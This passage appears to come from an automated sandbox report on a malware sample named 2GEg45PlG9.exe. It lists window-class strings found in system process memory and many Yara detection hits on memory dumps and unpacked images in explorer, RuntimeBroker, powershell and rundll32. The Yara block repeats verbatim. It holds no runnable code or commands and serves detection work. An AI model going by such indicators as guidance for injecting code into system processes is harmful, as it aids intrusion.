Source: control.exe, 00000015.00000000.465834683.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.463412327.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.469746208.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.467731710.00000192823C0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.482740469.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000018.00000000.479425710.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506871853.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.481209654.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506458599.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.559720745.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.554305571.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.542290609.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.531101419.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.537380226.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000002.839664387.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.547364996.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.565113464.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.617259125.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.605838216.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.586548469.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.593422268.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.600027354.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.611451927.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579445287.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.840115033.00000163C2A60000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: control.exe, 00000015.00000000.465834683.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.463412327.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.469746208.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.467731710.00000192823C0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.479425710.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506871853.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.481209654.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506458599.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.559720745.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.554305571.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.542290609.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.531101419.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.537380226.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000002.839664387.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.547364996.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.565113464.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.617259125.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.605838216.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.586548469.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.593422268.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.600027354.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.611451927.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579445287.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.840115033.00000163C2A60000.00000002.00020000.sdmp | Binary or memory string: Progman |
Source: control.exe, 00000015.00000000.465834683.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.463412327.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.469746208.00000192823C0000.00000002.00020000.sdmp, control.exe, 00000015.00000000.467731710.00000192823C0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.479425710.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506871853.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.481209654.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000018.00000000.506458599.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.559720745.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.554305571.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.542290609.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.531101419.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.537380226.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000002.839664387.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.547364996.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001D.00000000.565113464.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.617259125.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.605838216.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.586548469.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.593422268.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.600027354.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.611451927.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579445287.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.840115033.00000163C2A60000.00000002.00020000.sdmp | Binary or memory string: Progmanlock |
Source: explorer.exe, 00000018.00000000.516789473.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000018.00000000.494619616.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh |
Source: Yara match | File source: 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.399143772.000000000291C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346977655.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702102398.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702289385.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702177373.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346937674.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702063313.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702232762.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346992994.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346913060.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346959210.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702016813.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702206900.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.703676134.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.701957024.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.838458423.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347006812.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347017616.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702145483.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 2GEg45PlG9.exe PID: 6540, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4768, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6576, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6500, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a994a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.2GEg45PlG9.exe.20d0000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000023.00000000.640272876.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.665585940.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.607122164.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397282239.0000000002A99000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.517379497.0000000002720000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.645879141.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.651725640.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.465481306.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.566373017.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.469185979.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.547994492.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.560669492.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.585352410.000002E0BE597000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.516035040.0000000002559000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.613095849.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.663821435.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.546791184.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.618879777.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.555920972.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.544941434.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397218720.0000000002A1A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.661999238.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.466675811.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.473205364.000002E0C721C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347025160.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.551762255.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000002.841098267.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.399143772.000000000291C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346977655.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549603745.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702102398.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702289385.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702177373.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346937674.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.542333529.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702063313.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702232762.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.455384028.00000000040F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346992994.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470344123.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346913060.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.346959210.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.393561682.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.470416352.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.848361945.00000163C5B02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000002.844738201.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702016813.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397469002.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702206900.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.703676134.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.701957024.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.838458423.0000027741E02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347006812.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.347017616.0000000002B18000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.553064845.0000019283CFC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.702145483.0000000003298000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000003.549734741.0000023D83CEC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 2GEg45PlG9.exe PID: 6540, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4768, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6576, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6500, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a994a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2a1a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.2GEg45PlG9.exe.20d0000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.25594a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.2GEg45PlG9.exe.2ac4ef0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000023.00000000.640272876.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.665585940.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.607122164.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397282239.0000000002A99000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.517379497.0000000002720000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.645879141.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.651725640.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.465481306.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.566373017.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.469185979.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.547994492.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.560669492.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.585352410.000002E0BE597000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.516035040.0000000002559000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.613095849.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.663821435.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.546791184.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.618879777.00000163C5160000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001D.00000000.555920972.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.544941434.0000023D83620000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.397218720.0000000002A1A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.661999238.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.466675811.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY |